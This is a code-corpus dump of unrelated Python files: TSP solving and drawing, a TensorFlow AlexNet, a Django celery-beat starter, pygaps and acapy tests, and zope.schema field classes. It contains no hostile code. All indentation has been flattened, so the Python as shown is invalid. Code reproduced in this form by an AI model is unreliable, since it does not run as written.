"""Takes a set of nodes and a path, and outputs an image of the drawn TSP path"""
tsp_path = []
for location in path:
tsp_path.append(nodes[int(location)])
original_image = Image.open(ORIGINAL_IMAGE)
width, height = original_image.size
tsp_image = Image.new("RGBA",(width,height),color='white')
tsp_image_draw = ImageDraw.Draw(tsp_image)
#tsp_image_draw.point(tsp_path,fill='black')
tsp_image_draw.line(tsp_path,fill='black',width=1)
tsp_image = tsp_image.transpose(Image.FLIP_TOP_BOTTOM)
FINAL_IMAGE = IMAGE_TSP.replace("-stipple.tsp","-tsp.png")
tsp_image.save(FINAL_IMAGE)
print("TSP solution has been drawn and can be viewed at", FINAL_IMAGE)
def nearest_neighbors_solution(distance_matrix):
visited = {i: False for i in range(NUMBER_OF_POINTS)}
nearest_neighbors = {i: -1 for i in range(NUMBER_OF_POINTS)}
last_vertex = INITIAL_VERTEX
should_continue = True
while should_continue:
should_continue = False
visited[last_vertex] = True
shortest_distance = float("inf")
closest_neighbor = -1
for i in distance_matrix[last_vertex]:
if distance_matrix[last_vertex][i] < shortest_distance and not (visited[i]):
shortest_distance = distance_matrix[last_vertex][i]
closest_neighbor = i
should_continue = True
if should_continue:
nearest_neighbors[last_vertex] = closest_neighbor
last_vertex = closest_neighbor
else:
nearest_neighbors[last_vertex] = INITIAL_VERTEX
return nearest_neighbors
def two_opt_solution(distance_matrix):
solution = nearest_neighbors_solution(distance_matrix)
original_group = convert_solution_to_group(solution)
partitions = NUMBER_OF_PARTITIONS
while(partitions > 0):
two_opt(distance_matrix, original_group, partitions)
partitions = int(partitions / 2)
new_solution = convert_group_to_solution(original_group)
return new_solution
def two_opt(distance_matrix, group, partitions):
partition_size = int(len(group)/partitions)
for k in range(partitions):
while True:
min_change = 0
min_i = -1
min_j = -1
for i in range(1 + (k*partition_size), ((k+1)*partition_size)-2):
for j in range(i+1, ((k+1)*partition_size)):
u = group[i-1]
v = group[i]
w = group[j]
x = group[(j+1) % ((k+1)*partition_size)]
current_distance = (distance_matrix[u][v] + distance_matrix[w][x])
new_distance = (distance_matrix[u][w] + distance_matrix[v][x])
change = new_distance - current_distance
if change < min_change:
min_change = change
min_i = i
min_j = j
swap_edges(group, min_i, min_j)
if min_change == 0:
break
print(min_change)
def swap_edges(group, v, w):
#Reverses the entire slice, from vertex v to vertex w (including v and w)
group[v:w+1] = group[v:w+1][::-1]
def convert_group_to_solution(group):
solution = {}
for i in range(len(group)-1):
solution[group[i]] = group[i+1]
solution[group[-1]] = NUMBER_OF_POINTS
print(solution)
return solution
def convert_solution_to_group(solution):
head = INITIAL_VERTEX
group = []
for i in range(NUMBER_OF_POINTS):
group.append(head)
head = solution[head]
return group
def calculate_group_cost(distance_matrix, group):
cost = 0
for i in range(len(group)):
cost += distance_matrix[group[i]][group[(i+1) % len(group)]]
return cost
def main():
"""Entry point of the program."""
starting_moment = time.time()
# Instantiate the data problem.
print("Step 1/5: Initialising variables")
data = create_data_model()
# Create the routing index manager.
manager = pywrapcp.RoutingIndexManager(len(data['locations']),
data['num_vehicles'], data['depot'])
# Create Routing Model.
routing = pywrapcp.RoutingModel(manager)
print("Step 2/5: Computing distance matrix")
distance_matrix = compute_euclidean_distance_matrix(data['locations'])
def distance_callback(from_index, to_index):
"""Returns the distance between the two nodes."""
# Convert from routing variable Index to distance matrix NodeIndex.
from_node = manager.IndexToNode(from_index)
to_node = manager.IndexToNode(to_index)
return distance_matrix[from_node][to_node]
transit_callback_index = routing.RegisterTransitCallback(distance_callback)
# Define cost of each arc.
routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)
# Setting first solution heuristic.
print("Step 3/5: Setting an initial solution")
search_parameters = pywrapcp.DefaultRoutingSearchParameters()
search_parameters.first_solution_strategy = (
routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC)
# Solve the problem.
print("Step 4/5: Solving")
#solution = routing.SolveWithParameters(search_parameters)
#solution = nearest_neighbors_solution(distance_matrix)
solution = two_opt_solution(distance_matrix)
# Print solution on console.
if solution:
#print_solution(manager, routing, solution)
print("Step 5/5: Drawing the solution")
routes = get_routes(solution, routing, manager)
draw_routes(data['locations'], routes)
else:
print("A solution couldn't be found :(")
finishing_moment = time.time()
print("Total time elapsed during execution: " + str(finishing_moment - starting_moment) + " seconds")
print("Total distance: " + str(calculate_group_cost(distance_matrix, convert_solution_to_group(solution))))
if __name__ == '__main__':
main() | StarcoderdataPython |
3217064 | import configuration
import unittest
#https://docs.python.org/2/library/unittest.html
class PowerDeviationMatrixConfigurationTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_matrix_value(self):
matrix = configuration.PowerDeviationMatrixConfiguration("/Users/stuart/PCWG/Data/PowerDeviationMatrix.xml")
self.assertEqual(matrix[(0.011, 0.55)], 0.01)
def MatrixSuite():
suite = unittest.TestSuite()
suite.addTest(PowerDeviationMatrixConfigurationTest('test_matrix_value'))
return suite
unittest.TextTestRunner(verbosity=2).run(MatrixSuite())
| StarcoderdataPython |
8093388 | from csrv.model.cards import card_info
from csrv.model.cards import resource
class Card01052(resource.Resource):
NAME = u'Card01052'
SET = card_info.CORE
NUMBER = 52
SIDE = card_info.RUNNER
FACTION = card_info.NEUTRAL
INFLUENCE = 0
UNIQUE = False
KEYWORDS = set([
card_info.LINK,
])
COST = 1
IMAGE_SRC = '01052.png'
def build_actions(self):
resource.Resource.build_actions(self)
def on_install(self):
resource.Resource.on_install(self)
self.player.link.gain(1)
def on_uninstall(self):
resource.Resource.on_uninstall(self)
self.player.link.lose(1)
| StarcoderdataPython |
9691463 | from shutil import copyfile
from get_contributing_area import get_upstream_nodes
from swmmio import swmmio
model_input_file = "../hague_model/v2014_Hague_EX_10yr_MHHW_mod2_trim.inp"
model_input_file_tmp = model_input_file.replace(".inp", "_tmp.inp")
copyfile(model_input_file, model_input_file.replace(".inp", "_tmp.inp"))
mymodel = swmmio.Model(model_input_file)
nodes = mymodel.nodes()
cons = mymodel.conduits()
subs = mymodel.subcatchments()
non_important_outfalls = ['D14200', 'D143000', 'D14860', 'D1489', 'D14240', 'D14153', 'D14110',
'E14310', 'E145200', 'E14330', 'D14165', 'D14124', 'D14300']
non_rel_nodes = []
for out in non_important_outfalls:
us_nodes = get_upstream_nodes(out, cons)
non_rel_nodes.extend(us_nodes)
non_rel_nodes.append(out)
relevant_lines = []
with open(model_input_file_tmp, 'r') as inpfile:
for line in inpfile:
if all(node not in line for node in non_rel_nodes):
relevant_lines.append(line)
with open(model_input_file_tmp, 'w') as inpfile:
inpfile.writelines(relevant_lines)
| StarcoderdataPython |
6684589 | """Tests relating to the Material class."""
import pytest
import pygaps
@pytest.mark.core
class TestMaterial():
"""Test the material class."""
def test_material_basic(self):
"""Basic creation tests."""
mat = pygaps.Material('material1', 'batch')
assert mat == 'material1'
assert mat != 'Material1'
mat2 = pygaps.Material('material1', 'batch')
assert mat == mat2
def test_material_create(self, material_data, basic_material):
"""Check material can be created from test data."""
assert material_data == basic_material.to_dict()
def test_material_retrieved_list(self, material_data, basic_material):
"""Check material can be retrieved from master list."""
pygaps.data.MATERIAL_LIST.append(basic_material)
uploaded_material = pygaps.Material.find(
material_data.get('name'),
material_data.get('batch'))
assert material_data == uploaded_material.to_dict()
with pytest.raises(pygaps.ParameterError):
pygaps.Material.find('noname', 'nobatch')
def test_material_get_properties(self, material_data, basic_material):
"""Check if properties of a material can be located."""
assert basic_material.get_prop(
'density') == material_data.get('density')
density = basic_material.properties.pop('density')
with pytest.raises(pygaps.ParameterError):
basic_material.get_prop('density')
basic_material.properties['density'] = density
def test_material_print(self, basic_material):
"""Checks the printing can be done."""
print(basic_material)
| StarcoderdataPython |
11216368 | <filename>server/start_scheduler.py
#!/usr/bin/env python
import django, os, subprocess, sys, shlex
sys.path.append(os.path.dirname(__file__))
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "dva.settings")
django.setup()
from django_celery_beat.models import PeriodicTask, IntervalSchedule
every_three_minutes, _ = IntervalSchedule.objects.get_or_create(every=os.environ.get('REFRESH_MINUTES', 3),
period=IntervalSchedule.MINUTES)
every_minute, _ = IntervalSchedule.objects.get_or_create(every=os.environ.get('REFRESH_MINUTES', 1),
period=IntervalSchedule.MINUTES)
_ = PeriodicTask.objects.get_or_create(name="refresher", task="monitor_retrievers", interval=every_minute,
queue='qscheduler')
_ = PeriodicTask.objects.get_or_create(name="monitoring", task="monitor_system", interval=every_three_minutes,
queue='qscheduler')
p = subprocess.Popen(['./startq.py', 'qscheduler'])
# Remove stale celerybeat pidfile which happens in dev mode
if os.path.isfile('celerybeat.pid'):
os.remove('celerybeat.pid')
subprocess.check_call(shlex.split(
"celery -A dva beat -l info --scheduler django_celery_beat.schedulers:DatabaseScheduler -f ../logs/beat.log"))
| StarcoderdataPython |
9763829 | <reponame>kingzhengguang/tensorflow_alexnet_classify-cat-dog-
import tensorflow as tf
def alexnet(x, keep_prob, num_classes):
# conv1
with tf.name_scope('conv1') as scope:
kernel = tf.Variable(tf.truncated_normal([11, 11, 3, 96], dtype=tf.float32,
stddev=1e-1), name='weights')
conv = tf.nn.conv2d(x, kernel, [1, 4, 4, 1], padding='SAME')
biases = tf.Variable(tf.constant(0.0, shape=[96], dtype=tf.float32),
trainable=True, name='biases')
bias = tf.nn.bias_add(conv, biases)
conv1 = tf.nn.relu(bias, name=scope)
# lrn1
with tf.name_scope('lrn1') as scope:
lrn1 = tf.nn.local_response_normalization(conv1,
alpha=1e-4,
beta=0.75,
depth_radius=2,
bias=2.0)
# pool1
with tf.name_scope('pool1') as scope:
pool1 = tf.nn.max_pool(lrn1,
ksize=[1, 3, 3, 1],
strides=[1, 2, 2, 1],
padding='VALID')
# conv2
with tf.name_scope('conv2') as scope:
pool1_groups = tf.split(axis=3, value = pool1, num_or_size_splits = 2)
kernel = tf.Variable(tf.truncated_normal([5, 5, 48, 256], dtype=tf.float32,
stddev=1e-1), name='weights')
kernel_groups = tf.split(axis=3, value = kernel, num_or_size_splits = 2)
conv_up = tf.nn.conv2d(pool1_groups[0], kernel_groups[0], [1,1,1,1], padding='SAME')
conv_down = tf.nn.conv2d(pool1_groups[1], kernel_groups[1], [1,1,1,1], padding='SAME')
biases = tf.Variable(tf.constant(0.0, shape=[256], dtype=tf.float32),
trainable=True, name='biases')
biases_groups = tf.split(axis=0, value=biases, num_or_size_splits=2)
bias_up = tf.nn.bias_add(conv_up, biases_groups[0])
bias_down = tf.nn.bias_add(conv_down, biases_groups[1])
bias = tf.concat(axis=3, values=[bias_up, bias_down])
conv2 = tf.nn.relu(bias, name=scope)
# lrn2
with tf.name_scope('lrn2') as scope:
lrn2 = tf.nn.local_response_normalization(conv2,
alpha=1e-4,
beta=0.75,
depth_radius=2,
bias=2.0)
# pool2
with tf.name_scope('pool2') as scope:
pool2 = tf.nn.max_pool(lrn2,
ksize=[1, 3, 3, 1],
strides=[1, 2, 2, 1],
padding='VALID')
# conv3
with tf.name_scope('conv3') as scope:
kernel = tf.Variable(tf.truncated_normal([3, 3, 256, 384],
dtype=tf.float32,
stddev=1e-1), name='weights')
conv = tf.nn.conv2d(pool2, kernel, [1, 1, 1, 1], padding='SAME')
biases = tf.Variable(tf.constant(0.0, shape=[384], dtype=tf.float32),
trainable=True, name='biases')
bias = tf.nn.bias_add(conv, biases)
conv3 = tf.nn.relu(bias, name=scope)
# conv4
with tf.name_scope('conv4') as scope:
conv3_groups = tf.split(axis=3, value=conv3, num_or_size_splits=2)
kernel = tf.Variable(tf.truncated_normal([3, 3, 192, 384],
dtype=tf.float32,
stddev=1e-1), name='weights')
kernel_groups = tf.split(axis=3, value=kernel, num_or_size_splits=2)
conv_up = tf.nn.conv2d(conv3_groups[0], kernel_groups[0], [1, 1, 1, 1], padding='SAME')
conv_down = tf.nn.conv2d(conv3_groups[1], kernel_groups[1], [1,1,1,1], padding='SAME')
biases = tf.Variable(tf.constant(0.0, shape=[384], dtype=tf.float32),
trainable=True, name='biases')
biases_groups = tf.split(axis=0, value=biases, num_or_size_splits=2)
bias_up = tf.nn.bias_add(conv_up, biases_groups[0])
bias_down = tf.nn.bias_add(conv_down, biases_groups[1])
bias = tf.concat(axis=3, values=[bias_up,bias_down])
conv4 = tf.nn.relu(bias, name=scope)
# conv5
with tf.name_scope('conv5') as scope:
conv4_groups = tf.split(axis=3, value=conv4, num_or_size_splits=2)
kernel = tf.Variable(tf.truncated_normal([3, 3, 192, 256],
dtype=tf.float32,
stddev=1e-1), name='weights')
kernel_groups = tf.split(axis=3, value=kernel, num_or_size_splits=2)
conv_up = tf.nn.conv2d(conv4_groups[0], kernel_groups[0], [1, 1, 1, 1], padding='SAME')
conv_down = tf.nn.conv2d(conv4_groups[1], kernel_groups[1], [1,1,1,1], padding='SAME')
biases = tf.Variable(tf.constant(0.0, shape=[256], dtype=tf.float32),
trainable=True, name='biases')
biases_groups = tf.split(axis=0, value=biases, num_or_size_splits=2)
bias_up = tf.nn.bias_add(conv_up, biases_groups[0])
bias_down = tf.nn.bias_add(conv_down, biases_groups[1])
bias = tf.concat(axis=3, values=[bias_up,bias_down])
conv5 = tf.nn.relu(bias, name=scope)
# pool5
with tf.name_scope('pool5') as scope:
pool5 = tf.nn.max_pool(conv5,
ksize=[1, 3, 3, 1],
strides=[1, 2, 2, 1],
padding='VALID',)
# flattened6
with tf.name_scope('flattened6') as scope:
flattened = tf.reshape(pool5, shape=[-1, 6*6*256])
# fc6
with tf.name_scope('fc6') as scope:
weights = tf.Variable(tf.truncated_normal([6*6*256, 4096],
dtype=tf.float32,
stddev=1e-1), name='weights')
biases = tf.Variable(tf.constant(0.0, shape=[4096], dtype=tf.float32),
trainable=True, name='biases')
bias = tf.nn.xw_plus_b(flattened, weights, biases)
fc6 = tf.nn.relu(bias)
# dropout6
with tf.name_scope('dropout6') as scope:
dropout6 = tf.nn.dropout(fc6, keep_prob)
# fc7
with tf.name_scope('fc7') as scope:
weights = tf.Variable(tf.truncated_normal([4096,4096],
dtype=tf.float32,
stddev=1e-1), name='weights')
biases = tf.Variable(tf.constant(0.0, shape=[4096], dtype=tf.float32),
trainable=True, name='biases')
bias = tf.nn.xw_plus_b(dropout6, weights, biases)
fc7 = tf.nn.relu(bias)
# dropout7
with tf.name_scope('dropout7') as scope:
dropout7 = tf.nn.dropout(fc7, keep_prob)
# fc8
with tf.name_scope('fc8') as scope:
weights = tf.Variable(tf.truncated_normal([4096, num_classes],
dtype=tf.float32,
stddev=1e-1), name='weights')
biases = tf.Variable(tf.constant(0.0, shape=[num_classes], dtype=tf.float32),
trainable=True, name='biases')
fc8 = tf.nn.xw_plus_b(dropout7, weights, biases)
return fc8 | StarcoderdataPython |
173517 | import pytest
from fastapi import HTTPException
from mockito import when
from acapy_ledger_facade import get_taa, accept_taa, get_did_endpoint
# need this to handle the async with the mock
async def get(response):
return response
@pytest.mark.asyncio
async def test_error_on_get_taa(mock_agent_controller):
when(mock_agent_controller.ledger).get_taa().thenReturn(get({}))
with pytest.raises(HTTPException) as exc:
await get_taa(mock_agent_controller)
assert exc.value.status_code == 404
assert exc.value.detail == "Something went wrong. Could not get TAA. {}"
@pytest.mark.asyncio
async def test_error_on_accept_taa(mock_agent_controller):
error_response = {"x": "y"}
when(mock_agent_controller.ledger).accept_taa("data").thenReturn(
get(error_response)
)
with pytest.raises(HTTPException) as exc:
await accept_taa(mock_agent_controller, "data")
assert exc.value.status_code == 404
assert (
exc.value.detail
== f"Something went wrong. Could not accept TAA. {str(error_response)}"
)
@pytest.mark.asyncio
async def test_error_on_get_did_endpoint(mock_agent_controller):
when(mock_agent_controller.ledger).get_did_endpoint("data").thenReturn(get(None))
with pytest.raises(HTTPException) as exc:
await get_did_endpoint(mock_agent_controller, "data")
assert exc.value.status_code == 404
assert (
exc.value.detail == f"Something went wrong. Could not obtain issuer endpoint."
)
| StarcoderdataPython |
5120798 | # -*- coding: utf-8 -*-
"""sub.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1zbz7f1U5qW3qRg9u_boBMz8jwsg6ffVS
"""
def subtract(n1,n2):
print(n1-n2)
#edited version
| StarcoderdataPython |
8056728 | <reponame>tharindu1st/apim-migration-resources<filename>apim-migration-testing-tool/Python/venv/lib/python3.6/site-packages/zope/schema/_bootstrapfields.py<gh_stars>0
##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Bootstrapping fields
"""
__docformat__ = 'restructuredtext'
import decimal
import fractions
import numbers
import sys
import threading
from math import isinf
from zope.interface import Attribute
from zope.interface import Invalid
from zope.interface import Interface
from zope.interface import providedBy
from zope.interface import implementer
from zope.interface.interface import InterfaceClass
from zope.interface.interfaces import IInterface
from zope.interface.interfaces import IMethod
from zope.event import notify
from zope.schema._bootstrapinterfaces import ConstraintNotSatisfied
from zope.schema._bootstrapinterfaces import IBeforeObjectAssignedEvent
from zope.schema._bootstrapinterfaces import IContextAwareDefaultFactory
from zope.schema._bootstrapinterfaces import IFromBytes
from zope.schema._bootstrapinterfaces import IFromUnicode
from zope.schema._bootstrapinterfaces import IValidatable
from zope.schema._bootstrapinterfaces import NotAContainer
from zope.schema._bootstrapinterfaces import NotAnIterator
from zope.schema._bootstrapinterfaces import NotAnInterface
from zope.schema._bootstrapinterfaces import RequiredMissing
from zope.schema._bootstrapinterfaces import SchemaNotCorrectlyImplemented
from zope.schema._bootstrapinterfaces import SchemaNotFullyImplemented
from zope.schema._bootstrapinterfaces import SchemaNotProvided
from zope.schema._bootstrapinterfaces import StopValidation
from zope.schema._bootstrapinterfaces import TooBig
from zope.schema._bootstrapinterfaces import TooLong
from zope.schema._bootstrapinterfaces import TooShort
from zope.schema._bootstrapinterfaces import TooSmall
from zope.schema._bootstrapinterfaces import ValidationError
from zope.schema._bootstrapinterfaces import WrongType
from zope.schema._compat import text_type
from zope.schema._compat import integer_types
from zope.schema._compat import PY2
class _NotGiven(object):
def __repr__(self): # pragma: no cover
return "<Not Given>"
_NotGiven = _NotGiven()
class ValidatedProperty(object):
def __init__(self, name, check=None, allow_none=False):
self._name = name
self._check = check
self._allow_none = allow_none
def __set__(self, inst, value):
bypass_validation = (value is None and self._allow_none) or value == inst.missing_value
if not bypass_validation:
if self._check is not None:
self._check(inst, value)
else:
inst.validate(value)
inst.__dict__[self._name] = value
def __get__(self, inst, owner):
if inst is None:
return self
return inst.__dict__[self._name]
class DefaultProperty(ValidatedProperty):
def __get__(self, inst, owner):
if inst is None:
return self
defaultFactory = inst.__dict__.get('defaultFactory')
# If there is no default factory, simply return the default.
if defaultFactory is None:
return inst.__dict__[self._name]
# Get the default value by calling the factory. Some factories might
# require a context to produce a value.
if IContextAwareDefaultFactory.providedBy(defaultFactory):
value = defaultFactory(inst.context)
else:
value = defaultFactory()
# Check that the created value is valid.
if self._check is not None:
self._check(inst, value)
elif value != inst.missing_value:
inst.validate(value)
return value
def getFields(schema):
"""Return a dictionary containing all the Fields in a schema.
"""
fields = {}
for name in schema:
attr = schema[name]
if IValidatable.providedBy(attr):
fields[name] = attr
return fields
class _DocStringHelpers(object):
# Namespace object to hold methods related to ReST formatting
# docstrings
@staticmethod
def docstring_to_lines(docstring):
# Similar to what sphinx.utils.docstrings.prepare_docstring
# does. Strip leading equal whitespace, accounting for an initial line
# that might not have any. Return a list of lines, with a trailing
# blank line.
lines = docstring.expandtabs().splitlines()
# Find minimum indentation of any non-blank lines after ignored lines.
margin = sys.maxsize
for line in lines[1:]:
content = len(line.lstrip())
if content:
indent = len(line) - content
margin = min(margin, indent)
# Remove indentation from first ignored lines.
if len(lines) >= 1:
lines[0] = lines[0].lstrip()
if margin < sys.maxsize:
for i in range(1, len(lines)):
lines[i] = lines[i][margin:]
# Remove any leading blank lines.
while lines and not lines[0]:
lines.pop(0)
#
lines.append('')
return lines
@staticmethod
def make_class_directive(kind):
mod = kind.__module__
if kind.__module__ in ('__builtin__', 'builtins'):
mod = ''
if mod in ('zope.schema._bootstrapfields', 'zope.schema._field'):
mod = 'zope.schema'
mod += '.' if mod else ''
return ':class:`%s%s`' % (mod, kind.__name__)
@classmethod
def make_field(cls, name, value):
return ":%s: %s" % (name, value)
@classmethod
def make_class_field(cls, name, kind):
if isinstance(kind, (type, InterfaceClass)):
return cls.make_field(name, cls.make_class_directive(kind))
if isinstance(kind, tuple):
return cls.make_field(
name,
', '.join([cls.make_class_directive(t) for t in kind]))
class Field(Attribute):
# Type restrictions, if any
_type = None
context = None
# If a field has no assigned value, it will be set to missing_value.
missing_value = None
# This is the default value for the missing_value argument to the
# Field constructor. A marker is helpful since we don't want to
# overwrite missing_value if it is set differently on a Field
# subclass and isn't specified via the constructor.
__missing_value_marker = _NotGiven
# Note that the "order" field has a dual existance:
# 1. The class variable Field.order is used as a source for the
# monotonically increasing values used to provide...
# 2. The instance variable self.order which provides a
# monotonically increasing value that tracks the creation order
# of Field (including Field subclass) instances.
order = 0
default = DefaultProperty('default')
# These were declared as slots in zope.interface, we override them here to
# get rid of the descriptors so they don't break .bind()
__name__ = None
interface = None
_Element__tagged_values = None
def __init__(self, title=u'', description=u'', __name__='',
required=True, readonly=False, constraint=None, default=None,
defaultFactory=None, missing_value=__missing_value_marker):
"""Pass in field values as keyword parameters.
Generally, you want to pass either a title and description, or
a doc string. If you pass no doc string, it will be computed
from the title and description. If you pass a doc string that
follows the Python coding style (title line separated from the
body by a blank line), the title and description will be
computed from the doc string. Unfortunately, the doc string
must be passed as a positional argument.
Here are some examples:
>>> from zope.schema._bootstrapfields import Field
>>> f = Field()
>>> f.__doc__, str(f.title), str(f.description)
('', '', '')
>>> f = Field(title=u'sample')
>>> str(f.__doc__), str(f.title), str(f.description)
('sample', 'sample', '')
>>> f = Field(title=u'sample', description=u'blah blah\\nblah')
>>> str(f.__doc__), str(f.title), str(f.description)
('sample\\n\\nblah blah\\nblah', 'sample', 'blah blah\\nblah')
"""
__doc__ = ''
# Fix leading whitespace that occurs when using multi-line
# strings, but don't overwrite the original, we need to
# preserve it (it could be a MessageID).
doc_description = '\n'.join(
_DocStringHelpers.docstring_to_lines(description or u'')[:-1]
)
if title:
if doc_description:
__doc__ = "%s\n\n%s" % (title, doc_description)
else:
__doc__ = title
elif description:
__doc__ = doc_description
super(Field, self).__init__(__name__, __doc__)
self.title = title
self.description = description
self.required = required
self.readonly = readonly
if constraint is not None:
self.constraint = constraint
self.default = default
self.defaultFactory = defaultFactory
# Keep track of the order of field definitions
Field.order += 1
self.order = Field.order
if missing_value is not self.__missing_value_marker:
self.missing_value = missing_value
def constraint(self, value):
return True
def bind(self, context):
clone = self.__class__.__new__(self.__class__)
clone.__dict__.update(self.__dict__)
clone.context = context
return clone
def validate(self, value):
if value == self.missing_value:
if self.required:
raise RequiredMissing(self.__name__).with_field_and_value(self, value)
else:
try:
self._validate(value)
except StopValidation:
pass
def __get_property_names_to_compare(self):
# Return the set of property names to compare, ignoring
# order
names = {} # used as set of property names, ignoring values
for interface in providedBy(self):
names.update(getFields(interface))
# order will be different always, don't compare it
names.pop('order', None)
return names
def __hash__(self):
# Equal objects should have equal hashes;
# equal hashes does not imply equal objects.
value = (type(self), self.interface) + tuple(self.__get_property_names_to_compare())
return hash(value)
def __eq__(self, other):
# should be the same type and in the same interface (or no interface at all)
if self is other:
return True
if type(self) != type(other) or self.interface != other.interface:
return False
# should have the same properties
names = self.__get_property_names_to_compare()
# XXX: What about the property names of the other object? Even
# though it's the same type, it could theoretically have
# another interface that it `alsoProvides`.
for name in names:
if getattr(self, name) != getattr(other, name):
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def _validate(self, value):
if self._type is not None and not isinstance(value, self._type):
raise WrongType(value, self._type, self.__name__).with_field_and_value(self, value)
try:
constraint = self.constraint(value)
except ValidationError as e:
if e.field is None:
e.field = self
if e.value is None:
e.value = value
raise
if not constraint:
raise ConstraintNotSatisfied(value, self.__name__).with_field_and_value(self, value)
def get(self, object):
return getattr(object, self.__name__)
def query(self, object, default=None):
return getattr(object, self.__name__, default)
def set(self, object, value):
if self.readonly:
raise TypeError("Can't set values on read-only fields "
"(name=%s, class=%s.%s)"
% (self.__name__,
object.__class__.__module__,
object.__class__.__name__))
setattr(object, self.__name__, value)
def getExtraDocLines(self):
"""
Return a list of ReST formatted lines that will be added
to the docstring returned by :meth:`getDoc`.
By default, this will include information about the various
properties of this object, such as required and readonly status,
required type, and so on.
This implementation uses a field list for this.
Subclasses may override or extend.
.. versionadded:: 4.6.0
"""
lines = []
lines.append(_DocStringHelpers.make_class_field('Implementation', type(self)))
lines.append(_DocStringHelpers.make_field("Read Only", self.readonly))
lines.append(_DocStringHelpers.make_field("Required", self.required))
if self.defaultFactory:
lines.append(_DocStringHelpers.make_field("Default Factory", repr(self.defaultFactory)))
else:
lines.append(_DocStringHelpers.make_field("Default Value", repr(self.default)))
if self._type:
lines.append(_DocStringHelpers.make_class_field("Allowed Type", self._type))
# key_type and value_type are commonly used, but don't
# have a common superclass to add them, so we do it here.
# Using a rubric produces decent formatting
for name, rubric in (('key_type', 'Key Type'),
('value_type', 'Value Type')):
field = getattr(self, name, None)
if hasattr(field, 'getDoc'):
lines.append("")
lines.append(".. rubric:: " + rubric)
lines.append("")
lines.append(field.getDoc())
return lines
def getDoc(self):
doc = super(Field, self).getDoc()
lines = _DocStringHelpers.docstring_to_lines(doc)
lines += self.getExtraDocLines()
lines.append('')
return '\n'.join(lines)
class Container(Field):
def _validate(self, value):
super(Container, self)._validate(value)
if not hasattr(value, '__contains__'):
try:
iter(value)
except TypeError:
raise NotAContainer(value).with_field_and_value(self, value)
# XXX This class violates the Liskov Substituability Principle: it
# is derived from Container, but cannot be used everywhere an instance
# of Container could be, because it's '_validate' is more restrictive.
class Iterable(Container):
def _validate(self, value):
super(Iterable, self)._validate(value)
# See if we can get an iterator for it
try:
iter(value)
except TypeError:
raise NotAnIterator(value).with_field_and_value(self, value)
class Orderable(object):
"""Values of ordered fields can be sorted.
They can be restricted to a range of values.
Orderable is a mixin used in combination with Field.
"""
min = ValidatedProperty('min', allow_none=True)
max = ValidatedProperty('max', allow_none=True)
def __init__(self, min=None, max=None, default=None, **kw):
# Set min and max to None so that we can validate if
# one of the super methods invoke validation.
self.min = None
self.max = None
super(Orderable, self).__init__(**kw)
# Now really set min and max
self.min = min
self.max = max
# We've taken over setting default so it can be limited by min
# and max.
self.default = default
def _validate(self, value):
super(Orderable, self)._validate(value)
if self.min is not None and value < self.min:
raise TooSmall(value, self.min).with_field_and_value(self, value)
if self.max is not None and value > self.max:
raise TooBig(value, self.max).with_field_and_value(self, value)
class MinMaxLen(object):
"""Expresses constraints on the length of a field.
MinMaxLen is a mixin used in combination with Field.
"""
min_length = 0
max_length = None
def __init__(self, min_length=0, max_length=None, **kw):
self.min_length = min_length
self.max_length = max_length
super(MinMaxLen, self).__init__(**kw)
def _validate(self, value):
super(MinMaxLen, self)._validate(value)
if self.min_length is not None and len(value) < self.min_length:
raise TooShort(value, self.min_length).with_field_and_value(self, value)
if self.max_length is not None and len(value) > self.max_length:
raise TooLong(value, self.max_length).with_field_and_value(self, value)
@implementer(IFromUnicode)
class Text(MinMaxLen, Field):
"""A field containing text used for human discourse."""
_type = text_type
def __init__(self, *args, **kw):
super(Text, self).__init__(*args, **kw)
def fromUnicode(self, str):
"""
>>> from zope.schema.interfaces import WrongType
>>> from zope.schema.interfaces import ConstraintNotSatisfied
>>> from zope.schema import Text
>>> from zope.schema._compat import text_type
>>> t = Text(constraint=lambda v: 'x' in v)
>>> t.fromUnicode(b"foo x spam") # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
zope.schema._bootstrapinterfaces.WrongType: ('foo x spam', <type 'unicode'>, '')
>>> result = t.fromUnicode(u"foo x spam")
>>> isinstance(result, bytes)
False
>>> str(result)
'foo x spam'
>>> t.fromUnicode(u"foo spam") # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
zope.schema._bootstrapinterfaces.ConstraintNotSatisfied: (u'foo spam', '')
"""
self.validate(str)
return str
class TextLine(Text):
"""A text field with no newlines."""
def constraint(self, value):
return '\n' not in value and '\r' not in value
class Password(TextLine):
"""A text field containing a text used as a password."""
UNCHANGED_PASSWORD = object()
def set(self, context, value):
"""Update the password.
We use a special marker value that a widget can use
to tell us that the password didn't change. This is
needed to support edit forms that don't display the
existing password and want to work together with
encryption.
"""
if value is self.UNCHANGED_PASSWORD:
return
super(Password, self).set(context, value)
def validate(self, value):
try:
existing = bool(self.get(self.context))
except AttributeError:
existing = False
if value is self.UNCHANGED_PASSWORD and existing:
# Allow the UNCHANGED_PASSWORD value, if a password is set already
return
return super(Password, self).validate(value)
@implementer(IFromUnicode, IFromBytes)
class Bool(Field):
"""
A field representing a Bool.
.. versionchanged:: 4.8.0
Implement :class:`zope.schema.interfaces.IFromBytes`
"""
_type = bool
def _validate(self, value):
# Convert integers to bools to they don't get mis-flagged
# by the type check later.
if isinstance(value, int):
value = bool(value)
Field._validate(self, value)
def set(self, object, value):
if isinstance(value, int):
value = bool(value)
Field.set(self, object, value)
def fromUnicode(self, value):
"""
>>> from zope.schema._bootstrapfields import Bool
>>> from zope.schema.interfaces import IFromUnicode
>>> b = Bool()
>>> IFromUnicode.providedBy(b)
True
